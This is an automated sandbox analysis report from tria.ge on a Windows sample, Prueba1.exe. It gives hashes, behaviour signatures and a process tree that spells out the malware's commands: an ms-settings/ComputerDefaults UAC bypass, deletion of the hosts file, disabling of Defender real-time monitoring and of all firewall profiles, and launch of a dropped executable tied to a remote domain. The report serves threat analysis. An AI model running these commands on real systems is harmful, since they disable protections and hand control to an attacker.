Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

25/09/2024, 17:58

240925-wkcztasbrd 8

25/09/2024, 17:55

240925-wheqmasarb 8

Analysis

  • max time kernel
    1793s
  • max time network
    1161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/09/2024, 17:58

General

  • Target

    Prueba1.exe

  • Size

    227KB

  • MD5

    4339cc7cb7c8df84a3a1bbd3cba4cf17

  • SHA1

    b041a7ac27006a3d204726cecef465a34f06a3f3

  • SHA256

    e3ebbde456c0c20d1436661909137cd38ce6be51cf78e7cb0d2944b124bed326

  • SHA512

    3e795d43daa63db9435ab3d03a6800719f25b1f8311188148c5ac51eea1835ca76a6fb10040559271e42de7b3d5e18dda89a572fb975ee60f6a90d1575a85f31

  • SSDEEP

    3072:W+PSS5WcZM55FjBcmnE2V/anyoQI5swjEG6vpRcuKtK41rL2JtjwKk:tPSPX5FWhMwj16xrcKaLWjwKk

Malware Config

Signatures

  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 22 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3516
    • C:\Users\Admin\AppData\Local\Temp\Prueba1.exe
      "C:\Users\Admin\AppData\Local\Temp\Prueba1.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4100
      • C:\Windows\system32\cmd.exe
        /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:216
        • C:\Windows\system32\reg.exe
          reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
            PID:1728
        • C:\Windows\system32\cmd.exe
          /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\450650.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5036
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\450650.vbs" /f
            4⤵
            • Modifies registry class
            PID:536
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
            4⤵
            • Modifies registry class
            PID:1864
        • C:\Windows\system32\cmd.exe
          /c start /B ComputerDefaults.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1720
          • C:\Windows\system32\ComputerDefaults.exe
            ComputerDefaults.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2804
            • C:\Windows\system32\wscript.exe
              "wscript.exe" C:\Users\Admin\AppData\Local\Temp\450650.vbs
              5⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:4432
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
                6⤵
                  PID:2512
          • C:\Windows\system32\cmd.exe
            /c del /f C:\Users\Admin\AppData\Local\Temp\450650.vbs
            3⤵
              PID:4036
            • C:\Windows\system32\cmd.exe
              /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4944
              • C:\Windows\system32\reg.exe
                reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                4⤵
                • Modifies registry class
                PID:4212
            • C:\Windows\system32\cmd.exe
              /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4288
              • C:\Windows\system32\reg.exe
                reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                4⤵
                  PID:4208
              • C:\Windows\system32\cmd.exe
                /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\993027.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1628
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\993027.vbs" /f
                  4⤵
                  • Modifies registry class
                  PID:1056
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                  4⤵
                  • Modifies registry class
                  PID:8
              • C:\Windows\system32\cmd.exe
                /c start /B ComputerDefaults.exe
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1964
                • C:\Windows\system32\ComputerDefaults.exe
                  ComputerDefaults.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2012
                  • C:\Windows\system32\wscript.exe
                    "wscript.exe" C:\Users\Admin\AppData\Local\Temp\993027.vbs
                    5⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:1612
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe 5i7z8k04ztx6gvgv4xrwd5b6tyvejz:ZmbyrFypnUjzwf2LD7LMX006:matchashop.icu
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3592
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe
                        C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe 5i7z8k04ztx6gvgv4xrwd5b6tyvejz:ZmbyrFypnUjzwf2LD7LMX006:matchashop.icu
                        7⤵
                        • Executes dropped EXE
                        • Drops file in Windows directory
                        • Checks processor information in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2492
                        • C:\Windows\system32\cmd.exe
                          /c attrib +h "C:\Windows\profapi.dll"
                          8⤵
                          • Hide Artifacts: Hidden Files and Directories
                          PID:3572
                          • C:\Windows\system32\attrib.exe
                            attrib +h "C:\Windows\profapi.dll"
                            9⤵
                            • Drops file in Windows directory
                            • Views/modifies file attributes
                            PID:4232
                        • C:\Windows\system32\cmd.exe
                          /c REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0 >nul
                          8⤵
                            PID:804
                            • C:\Windows\system32\reg.exe
                              REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0
                              9⤵
                                PID:2656
                            • C:\Windows\system32\cmd.exe
                              /c powershell Set-MpPreference -DisableRealtimeMonitoring $true >nul 2>&1
                              8⤵
                                PID:992
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                  9⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1620
                              • C:\Windows\system32\cmd.exe
                                /c netsh advfirewall set privateprofile state off >nul 2>&1
                                8⤵
                                  PID:3576
                                  • C:\Windows\system32\netsh.exe
                                    netsh advfirewall set privateprofile state off
                                    9⤵
                                    • Modifies Windows Firewall
                                    • Event Triggered Execution: Netsh Helper DLL
                                    PID:5076
                                • C:\Windows\system32\cmd.exe
                                  /c netsh advfirewall set domainprofile state off >nul 2>&1
                                  8⤵
                                    PID:4432
                                    • C:\Windows\system32\netsh.exe
                                      netsh advfirewall set domainprofile state off
                                      9⤵
                                      • Modifies Windows Firewall
                                      • Event Triggered Execution: Netsh Helper DLL
                                      PID:1016
                                  • C:\Windows\system32\cmd.exe
                                    /c netsh advfirewall set publicprofile state off >nul 2>&1
                                    8⤵
                                      PID:3256
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall set publicprofile state off
                                        9⤵
                                        • Modifies Windows Firewall
                                        • Event Triggered Execution: Netsh Helper DLL
                                        PID:4720
                                    • C:\Windows\system32\cmd.exe
                                      /c REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f >nul
                                      8⤵
                                        PID:4996
                                        • C:\Windows\system32\reg.exe
                                          REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f
                                          9⤵
                                            PID:4616
                                        • C:\ProgramData\NakedElephants.jpeg
                                          C:\ProgramData\NakedElephants.jpeg FuckHerFace
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:2004
                                        • C:\ProgramData\NakedElephants.jpeg
                                          C:\ProgramData\NakedElephants.jpeg FuckHerFace
                                          8⤵
                                          • Executes dropped EXE
                                          PID:1328
                                        • C:\ProgramData\NakedElephants.jpeg
                                          C:\ProgramData\NakedElephants.jpeg FuckHerFace
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:4100
                              • C:\Windows\system32\cmd.exe
                                /c del /f C:\Users\Admin\AppData\Local\Temp\993027.vbs
                                3⤵
                                  PID:4596
                                • C:\Windows\system32\cmd.exe
                                  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                  3⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2932
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                    4⤵
                                    • Modifies registry class
                                    PID:3924
                              • C:\Windows\system32\taskmgr.exe
                                "C:\Windows\system32\taskmgr.exe" /4
                                2⤵
                                • Checks SCSI registry key(s)
                                • Checks processor information in registry
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:2712
                              • C:\Windows\system32\taskmgr.exe
                                "C:\Windows\system32\taskmgr.exe" /4
                                2⤵
                                • Checks SCSI registry key(s)
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:5064

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\NakedElephants.jpeg

                              Filesize

                              38.3MB

                              MD5

                              40532ea36c2d4de56522ecf707bf289e

                              SHA1

                              86520c67e37b43366f965b63ba78070688bff83e

                              SHA256

                              08e994aa4659a0fd4674d93ed9e683dff7c020013629e39d6ea73091f2bcd33b

                              SHA512

                              41df9cc910afe6ffe7f92e1e26b607cf7fea18f52a746ca97d532406401035b5bb3ac5ebcb9bc659d4125cbf7262383aefc1f03a01886dc71e268b52ac2b43ce

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

                              Filesize

                              1KB

                              MD5

                              7fb5fa1534dcf77f2125b2403b30a0ee

                              SHA1

                              365d96812a69ac0a4611ea4b70a3f306576cc3ea

                              SHA256

                              33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

                              SHA512

                              a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

                              Filesize

                              436B

                              MD5

                              971c514f84bba0785f80aa1c23edfd79

                              SHA1

                              732acea710a87530c6b08ecdf32a110d254a54c8

                              SHA256

                              f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

                              SHA512

                              43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

                              Filesize

                              174B

                              MD5

                              6f9f0907d5726cd3872dda395848d100

                              SHA1

                              5832d2f1ad8caf5a8d532be7bae21fc1fadbd583

                              SHA256

                              3a17f5275d455c560b0ae68665355262e2c100762b52e19328507d4ed8e44aff

                              SHA512

                              b56cf8a7f295d69b567d53b6d0530f435ec7c5ad384be67471c5c7407a1db415e13edb50080cffe8db8ab78267a37a84bfe5b698c493dfdf5f5747764ecb0263

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

                              Filesize

                              170B

                              MD5

                              d6a0be01101794f0ce610ffb02825391

                              SHA1

                              3cf7accacb755e93e2755d32a98ae6a13bb83522

                              SHA256

                              4540f1fd59d77cc8b1638adbe60e927dce7ae088626be11ed0b2f23f3e0635e6

                              SHA512

                              e89df18eb8181b71659ad992025233186b9b99bc41048ad90d300eb77f91304f4f9cbe23f8824756073782420e927ae3fcf77b2385623c1e5536e24568af5ceb

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                              Filesize

                              64KB

                              MD5

                              d2fb266b97caff2086bf0fa74eddb6b2

                              SHA1

                              2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                              SHA256

                              b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                              SHA512

                              c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                              Filesize

                              4B

                              MD5

                              f49655f856acb8884cc0ace29216f511

                              SHA1

                              cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                              SHA256

                              7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                              SHA512

                              599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                              Filesize

                              944B

                              MD5

                              6bd369f7c74a28194c991ed1404da30f

                              SHA1

                              0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                              SHA256

                              878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                              SHA512

                              8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe

                              Filesize

                              2.8MB

                              MD5

                              958ad5bc744e1f8a1b09e246b5f6a182

                              SHA1

                              63d7709c189f60d8e94b4e8a0559347b8c48350b

                              SHA256

                              94e1f52951c77d6314cb353a6f6bbb085395551f37882483ceaf72a09ff145cc

                              SHA512

                              69719818d54fe31758e7bb0a736411cdf18275becb6e5b4c64b8b667f75bc08e3f8556959560d77ea651fe696bed6c0a0c0131a7ee4b77de6785f6c0fc073a6a

                            • C:\Users\Admin\AppData\Local\Temp\450650.vbs

                              Filesize

                              125B

                              MD5

                              8b4ed5c47fdddbeba260ef11cfca88c6

                              SHA1

                              868f11f8ed78ebe871f9da182d053f349834b017

                              SHA256

                              170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

                              SHA512

                              87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

                            • C:\Users\Admin\AppData\Local\Temp\993027.vbs

                              Filesize

                              241B

                              MD5

                              382e1bc1c9c5a5c923e52180214218b5

                              SHA1

                              ccc2e84c8520f755a5f05cf23acf74409ebd8ffb

                              SHA256

                              8a550aa1569d9047511f8641fec570f4a3de8449738b18deb22a07bfdb496e82

                              SHA512

                              4acd3582daa524b30d862cf166f4a3e44e0f52b442598b65082aec10468ade1643e646277fc9fe4bb9b333ad43275553217f031a08afe296f1fa76f4bb6917af

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tdb1ltnn.whl.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Windows\profapi.dll

                              Filesize

                              162KB

                              MD5

                              2b49be49c486e465f9f9d80f5c3f7460

                              SHA1

                              4d007b11d467bdabd2dcf063fd8572f81c046e5f

                              SHA256

                              113b0ab445c515fe24c0cced2651d59835279410a58ab33c5fb3d3c3507bf9b8

                              SHA512

                              ab2f6620ee02248613948b301fe5aa129f57603247a050b09c5b33c75e5ef05a89bd54a6a440155e1578da0ce8f1f79ba9e5f3e245d37cbcede17f1a334d6696

                            • memory/1620-53-0x00000176D3690000-0x00000176D36B2000-memory.dmp

                              Filesize

                              136KB

                            • memory/2004-66-0x00007FF973D60000-0x00007FF973D62000-memory.dmp

                              Filesize

                              8KB

                            • memory/2004-65-0x00007FF973D50000-0x00007FF973D52000-memory.dmp

                              Filesize

                              8KB

                            • memory/2712-73-0x000002E66D860000-0x000002E66D861000-memory.dmp

                              Filesize

                              4KB

                            • memory/2712-81-0x000002E66D860000-0x000002E66D861000-memory.dmp

                              Filesize

                              4KB

                            • memory/2712-78-0x000002E66D860000-0x000002E66D861000-memory.dmp

                              Filesize

                              4KB

                            • memory/2712-80-0x000002E66D860000-0x000002E66D861000-memory.dmp

                              Filesize

                              4KB

                            • memory/2712-82-0x000002E66D860000-0x000002E66D861000-memory.dmp

                              Filesize

                              4KB

                            • memory/2712-83-0x000002E66D860000-0x000002E66D861000-memory.dmp

                              Filesize

                              4KB

                            • memory/2712-74-0x000002E66D860000-0x000002E66D861000-memory.dmp

                              Filesize

                              4KB

                            • memory/2712-84-0x000002E66D860000-0x000002E66D861000-memory.dmp

                              Filesize

                              4KB

                            • memory/2712-72-0x000002E66D860000-0x000002E66D861000-memory.dmp

                              Filesize

                              4KB

                            • memory/2712-79-0x000002E66D860000-0x000002E66D861000-memory.dmp

                              Filesize

                              4KB

                            • memory/3516-33-0x00000000006A0000-0x00000000006A8000-memory.dmp

                              Filesize

                              32KB

                            • memory/3516-31-0x00000000006A0000-0x00000000006A8000-memory.dmp

                              Filesize

                              32KB

                            • memory/3516-34-0x00000000006A0000-0x00000000006A8000-memory.dmp

                              Filesize

                              32KB

                            • memory/3516-29-0x00000000006A0000-0x00000000006A8000-memory.dmp

                              Filesize

                              32KB

                            • memory/3516-30-0x00000000006D0000-0x00000000006D1000-memory.dmp

                              Filesize

                              4KB

                            • memory/4100-0-0x00000202A09C0000-0x00000202A09C1000-memory.dmp

                              Filesize

                              4KB

                            • memory/4100-4-0x00000202A0A60000-0x00000202A0A61000-memory.dmp

                              Filesize

                              4KB

                            • memory/4100-2-0x00000202A0A40000-0x00000202A0A41000-memory.dmp

                              Filesize

                              4KB

                            • memory/4100-1-0x00000202A09D0000-0x00000202A09D1000-memory.dmp

                              Filesize

                              4KB